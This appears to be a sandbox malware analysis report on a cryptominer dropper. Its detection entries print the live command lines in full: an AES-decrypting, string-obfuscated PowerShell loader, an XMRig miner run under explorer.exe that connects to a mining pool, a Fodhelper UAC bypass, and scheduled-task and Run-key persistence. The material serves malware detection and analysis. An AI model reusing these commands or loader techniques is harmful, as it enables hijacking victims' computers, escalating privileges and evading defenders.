        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth , CommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth , CommandLine|base64offset|contains: "+~~), Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7536, ParentProcessName: conhost.exe, ProcessCommandLine: C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth , ProcessId: 1528, ProcessName: explorer.exe

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); , CommandLine: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju
        Sigma detected: Bypass UAC via Fodhelper.exe
        Source: Process startedAuthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community: Data: Command: "cmd.exe" , CommandLine: "cmd.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\fodhelper.exe, ParentImage: C:\Windows\System32\fodhelper.exe, ParentProcessId: 6184, ParentProcessName: fodhelper.exe, ProcessCommandLine: "cmd.exe" , ProcessId: 5900, ProcessName: cmd.exe
        Sigma detected: Invoke-Obfuscation CLIP+ Launcher
        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7704, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ProcessId: 2968, ProcessName: cmd.exe
        Sigma detected: Invoke-Obfuscation VAR+ Launcher
        Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7704, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ProcessId: 2968, ProcessName: cmd.exe
        Sigma detected: Potential PowerShell Command Line Obfuscation
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yNoIOiWMAQGoVU=$iKNk
        Sigma detected: Potential WinAPI Calls Via CommandLine
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yNoIOiWMAQGoVU=$iKNk
        Sigma detected: Potentially Suspicious PowerShell Child Processes
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, CommandLine|base64offset|contains: 7z, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: powershell.exe -WindowStyle Hidden, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6052, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F, ProcessId: 7820, ProcessName: schtasks.exe
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] ('')); , CommandLine: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju
        Sigma detected: Powerup Write Hijack DLL
        Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1784, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
        Sigma detected: CurrentVersion Autorun Keys Modification
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1784, TargetFilename: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
        Sigma detected: Suspicious Powershell In Registry Run Keys
        Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6052, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR
        Sigma detected: Suspicious Schtasks From Env Var Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2968, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe", ProcessId: 7796, ProcessName: schtasks.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -WindowStyle Hidden, CommandLine: powershell.exe -WindowStyle Hidden, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7380, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -WindowStyle Hidden, ProcessId: 1784, ProcessName: powershell.exe
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7712, ProcessName: svchost.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-08T00:24:19.090576+020020362892Crypto Currency Mining Activity Detected192.168.2.10584551.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-08T00:23:47.629655+020028269302Crypto Currency Mining Activity Detected192.168.2.105446445.76.89.7080TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: e7WMhx18XN.exeAvira: detected
        Antivirus detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeAvira: detection malicious, Label: HEUR/AGEN.1344832
        Source: C:\Users\user\AppData\Local\Temp\services64.exeAvira: detection malicious, Label: HEUR/AGEN.1344202
        Source: C:\Users\user\AppData\Local\Temp\paint.exeAvira: detection malicious, Label: HEUR/AGEN.1344202
        Multi AV Scanner detection for submitted file
        Source: e7WMhx18XN.exeReversingLabs: Detection: 52%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\services64.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\paint.exeJoe Sandbox ML: detected
        Machine Learning detection for sample
        Source: e7WMhx18XN.exeJoe Sandbox ML: detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 56_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,56_2_00401000

        Privilege Escalation

        barindex
        UAC bypass detected (Fodhelper)
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeRegistry value created: NULL cmd.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exeRegistry value created: DelegateExecute Jump to behavior

        Bitcoin Miner

        barindex
        Yara detected SilentXMRMiner
        Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 6140, type: MEMORYSTR
        Yara detected Xmrig cryptocurrency miner
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
